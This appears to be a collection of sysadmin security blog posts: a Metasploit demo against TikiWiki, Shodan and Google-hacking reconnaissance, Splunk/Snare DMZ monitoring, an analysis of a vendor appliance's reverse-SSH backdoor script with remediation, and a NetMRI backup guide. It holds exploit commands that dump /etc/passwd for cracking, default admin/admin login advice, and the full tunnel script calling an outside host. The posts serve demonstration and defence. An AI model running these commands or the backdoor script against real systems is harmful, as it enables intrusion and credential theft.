msf exploit (tikiwiki_graph_formula_exec) > set PAYLOAD  cmd/unix/generic

msf exploit (tikiwiki_graph_formula_exec) > set CMD ‘cat /etc/passwd’

msf exploit (tikiwiki_graph_formula_exec) > exploit

The end results will be a screen display of the password file which you can run through your favorite password cracker and have fun with the results.

Fig-4 Cat “etc/passwd”

Lastly you can also connect to the host via http://hostname/tikiwiki/tiki-index.php and login with admin/admin which in most cases are usually among my list of default passwords to try. So in short these are just a few simple techniques you can try during your demo to bring some real world examples instead of just giving a  slides show to your audience.

References:

http://blog.metasploit.com/2010/05/introducing-metasploitable.html

http://www.offensive-security.com/metasploit-unleashed/Fast-Track-Modes

http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Disclaimer: I am not a Information Security professional or someone that has all the answers.Instead I am just an Admin that finds Infosec  interesting and try to learn whatever I can while commenting on things along the way.

While working on a demo for a presentation titled “Cracking, the script kiddie way”, I started thinking how easy it is to fall into a life of cybercrime . I feel this way because the are way too many “low hanging fruits” out there just waiting to be picked. People are constantly misconfiguring their systems or infrastructure devices, thus adding to the number of systems that can be accessed via the Internet with  default credentials or in some cases no credentials at all.

Point # 1: Shodan

I first heard about Shodan on Twitter, and  then shortly after on PaulDotCom security weekly podcast. After those two introductions I still didn’t find the time to truly appreciate Shodan until I saw a presentation by  Michael “theprez98″ Schearer.

Once I saw that I went out and started searching Shodan using a few of  his queries and sure enough I was able to view several Routers, Switches and Firewalls without needing any  credentials. Now with a bit of imagination you can get really creative with these devices.

Fig-1 Shodan search query

Figure-2   Firewall Access No Credentials

Figure-3 Switch access no credentials

Point #2 :Google Hacking (Query FU)

As many of you already know once something is on the Internet its there forever, even if you deleted it you can still find it cached somewhere. With that being said, with the right search queries you can find credit card numbers, social security numbers, user-names, passwords, just think about it and you can possibly find it out there.

The most recently query that made its way to twitter was a posting over at paste-it.net, where someone submitted tons of credit card numbers, complete with full names, and home addresses.

Figure-4 Credit Card numbers

Need I say more, with just these few simple examples you can see how easy it is for someone to sit at home and become a criminal over night if the so choose too. Just think about it, if I am already a criminal would I want to go out and rob someone with a gun or stay at home in my underwear and steal their identity, or just trade their bank information online for easy money.

I am not saying that we should all go out and do this, I just think too many times we think its OK to our systems poorly secured because we think we are not a valuable target, but just keep in mine someone can always use your network as a pivot point to further there cause.

OK, my rant is over, now lets go out there and secure something!

Refference Links

http://www.shodanhq.com/help/videos

http://pauldotcom.com/wiki/index.php/Episode177

http://www.hackersforcharity.org/ghdb/

Too many times we tend to deploy a DMZ host then just forget about it, we tend not to apply security patches, software updates, or even setup any form of monitoring. Contrary we spend most of our efforts monitoring and analyzing our internal network.

I am aware that many factors such as man power, budgeting or other things can affect this decision. Don’t get me wrong I am not choosing one side over the other; I just think we should place an equal among of importance on both. I was faced with the same challenges until I had a chat with Mick  http://twitter.com/bettersafetynet .

I will be showing how you can start monitoring your DMZ servers by simply installing Splunk free version of course, and SNARE event log forward for windows. The idea is simple just follow this link to assist you with getting Splunk up and running, next install Snare by following the instructions in the manual over at  http://www.intersectalliance.com/projects/SnareWindows/.

From here you just have to point your Snare client to your Splunk box and let the monitoring begin.

Testing:

After you are finish with your deployment the next thing you want to do is fire-off a few test alerts so you can understand so you can be familiar with the results. To achieve this I logged into one of the Servers that I am monitoring and restarted a few services, launch cmd.exe, and ran a few commands. The commands and results are displayed below.

Fig1 Restarting Apache web server.

Fig2 Splunk Output

Fig3 Launching cmd.exe and executing a few commands

Fig4 Splunk Output

As you can see from the above example the event logs that are being forwarded to Splunk can serve as a good source for tracking any potential compromise . Offloading your event logs to another servers can  come in handy if someone try to cover there tracks by wiping the logs.

So start monitoring and have fun with it!

While talking to a vendor of ours in response to an issue the vendor said to me ” I just logged in and everything looked OK”. Now those should be comforting words but for me that just set of a lot of loud bells and whistles, why you might ask?

Our network is setup more of less like any other network in the sense that we have a perimeter firewall that only allows certain ports inbound and outbound, in conjunction with your average ACL and NAT rules.

Now for the vendor to be able to login to our network I would have needed to create a NAT rule, and do some port forwarding then provide him with the public IP address that I used in the NAT.

However  I did not do any of the above and the vendor still had a way into our network. My first instinct was that the left a “Backdoor” on their appliance and the are doing some type of reverse tunneling.

After contacting the vendor and getting some help from mmiller over at irc.freenode.net  #pauldotcom, I was able to fully understand what was being done. Below is the little script that was allowing this to happen, it was place in /etc/init.d/.

Discovery:

SERVICE_CODE=1122

CUSTOMER_NAME=bob
RUSER=${CUSTOMER_NAME}${SERVICE_CODE}
PORT=${SERVICE_CODE}0
while :; do
ps auwx | grep “[s]sh.*${RUSER}@vendordomain.com” >/dev/null ||
ssh -f -N ${RUSER}@vendordomain.com -p 222 -R $PORT:localhost:22
sleep 10
done

And after running  ps -ef and ps aux I was able to confirm  the tunnel:

adminuser     15347     1  0 01:19 ?        00:00:00 ssh -f -N bob1122@vendordomain.com -p 222 -R 1029:localhost:22

adminuser     5236     1  0  01:19 ?        00:00:10 /bin/bash /etc/init.d/setup_tunnel

Basically the appliance was connecting to their corporate server, and from there the were able to connect to our network via ssh to manage their appliance.

Remediation:

1. I edited the started file and took out the line for port forwarding.
2. Changed the vendor configured passwords
3. Place the appliance in a separate VLAN and add it to our internal monitoring system.
4. Blocked port 222 outbound
5. Double checked the various cron jobs to see what was being scheduled to run on the system
6. Informed the vendor to make us aware of this in the future and going forward don’t do it again .

In the end this was a real eye opener and going forward I have a new mindset when it comes to vendor devices that have to live on our network. Hoping to get some comments on this one about how others segment vendor appliances on their network.

Additional reading

https://help.ubuntu.com/community/CronHowto

http://tldp.org/LDP/Bash-Beginners-Guide/html/sect_09_02.html

http://www.howtoforge.com/reverse-ssh-tunneling

Below are the necessary steps needed to backup the configuration on a router or switch using the NetMRI appliance. Steps 1-4 are the starting point for executing any jobs via the configuration manger, other scripts might require a few more steps.

1. Log into the NetMRI appliance http://netmri
2. Click on the “Configuration Management” tab

   

3. Click on the “Job Management” sub tab on the left à then select the scripts tab and the script to backup the IOS config is called “Backup IOS Config”.

   

4. Before you execute this you have to ask yourself if you want to create a schedule job or if you want to just run the job right now. If you chose to run the job right now follow the below steps:
   1. Click on the “Run Now” action
   2. Select the devices that you would like backup by either choosing the group “routing/switching” under the “Device Groups” tab or select the one or multiple devices from the “Devices” tab the select the “Run” button.

      Option A
      

   Option B

Click on the device tab and select the devices manually that would like the script to target.

1. Lastly enter the name/IP Address of the TFTP server that you would like to backup the config files too, and press OK.

   

   Click OK to proceed!

2. Once the job has been completed you will either see a red X in the status tab and the message error indicating that one or more jobs has not been processed.

   

Just click on the job name ,then the details tab and look for the device that has the error. You can then click on the “error” link for further details as to why the job did not run on the device in question.

Next click on the status log tab to  look at the detail error, in this case the NetMRI appliance was unable to connect to SW02 via SSH since this switch does not support SSH.

Note:

You can also schedule these jobs instead of running then manually, have fun and remember to backup your configs, cause you never know when you will need them.